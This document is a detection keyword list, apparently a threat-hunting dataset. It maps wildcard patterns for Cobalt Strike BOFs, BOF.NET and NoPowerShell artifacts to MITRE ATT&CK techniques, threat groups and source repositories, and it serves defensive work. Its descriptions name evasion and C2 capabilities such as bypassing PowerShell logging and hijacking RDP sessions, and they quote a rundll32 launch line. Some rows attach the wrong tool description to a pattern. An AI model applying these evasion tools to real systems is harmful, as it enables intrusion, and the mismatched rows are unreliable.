Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BOFNET.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BOFNET.sln*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_boo *.boo*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_execute *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_execute *,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands 
while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_execute.*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_execute.*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_execute.cpp.x64.obj*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_execute.cpp.x86.obj*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_init*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_job *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_jobkill*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_jobs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt 
Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_jobstatus *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_list*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_listassembiles*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_load *,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_load *.*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_shutdown*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 
- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BOFNET_Tests*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofportscan *,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,0,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*bof-quser *.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,0,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*bof-quser.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*bof-rdphijack*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
